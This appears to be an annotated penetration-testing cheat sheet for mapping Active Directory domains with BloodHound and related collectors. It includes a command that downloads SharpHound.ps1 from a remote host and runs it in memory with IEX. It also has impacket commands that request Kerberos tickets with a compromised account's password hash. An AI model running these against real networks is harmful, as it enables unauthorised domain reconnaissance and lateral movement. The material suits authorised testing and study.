Bloodhound
# Windows-side collection.
# PingCastle health check against the named domain.
PingCastle --healthcheck --server mydomain.com
# Fetch SharpHound.ps1 over plain HTTP and evaluate it in the current PowerShell
# session with IEX; nothing on this line verifies the script's integrity.
# Where PowerShell script block logging is enabled, the evaluated script text is
# recorded in the PowerShell Operational log (event 4104).
IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.45.185/SharpHound.ps1')
# Run the collector defined by that script against tree.corp.com, using the
# All and GPOLocalGroup collection methods.
Invoke-BloodHound -CollectionMethod "All,GPOLocalGroup" -Domain tree.corp.com
# Linux-side collection templates; <nameserver>, <domain>, <dc> and <ip> are
# placeholders to fill in.
# NOTE(review): -p on the command line leaves the password in shell history and
# in the process list.
bloodhound-python -v -u user -p password -ns <nameserver> -d <domain> -dc <dc> -c all,LoggedOn
# Alternatives to -p: -k authenticates with Kerberos from a ccache; --hashes takes a hash instead of a password.
# Same collection through NetExec's ldap protocol (--bloodhound), again with username/password.
nxc --verbose ldap <ip> -u user -p pass --bloodhound -ns <nameserver-ip> -d <domain> --collection All
# Alternatives to -p: -k authenticates with Kerberos from a ccache (a cifs service ticket must have been requested); -H takes a hash.
# /etc/krb5.conf may need to be configured for Kerberos authentication.
# Prerequisite for the ticket requests below: the vulnerable account is already compromised and its hash is known.
# impacket-getTGT corp.com/victim -hashes :12bb0b468b42c76d48a3a5ceb8ade2e9 -dc-ip xx.xx
# impacket-getST -spn cifs/targethost.domain.com corp.com/victim -hashes :12bb0b468b42c76d48a3a5ceb8ade2e9 -dc-ip {}
# Worked example for complyedge.com with Kerberos authentication (-k).
# Name resolution is set up first: the next two entries are file contents, not
# commands. They map the domain and the DC's FQDN to 172.16.177.168 and use
# that host as the resolver.
# presumably needed because Kerberos authenticates against hostnames rather than IPs; confirm for your setup
/etc/hosts
172.16.177.168 complyedge.com dmzdc01.complyedge.com
/etc/resolv.conf
nameserver 172.16.177.168
# Collect as user pete using the Kerberos ccache (-k) instead of a password.
# --dns-tcp and --dns-timeout 500 change how DNS lookups are made (TCP, longer
# timeout); --disable-pooling turns off the collector's worker subprocesses;
# --zip packs the output files into a single archive.
bloodhound-python -u pete -k -v -c all,LoggedOn -d complyedge.com -ns 172.16.177.168 -dc dmzdc01.complyedge.com --dns-timeout 500 --disable-pooling --dns-tcp --zip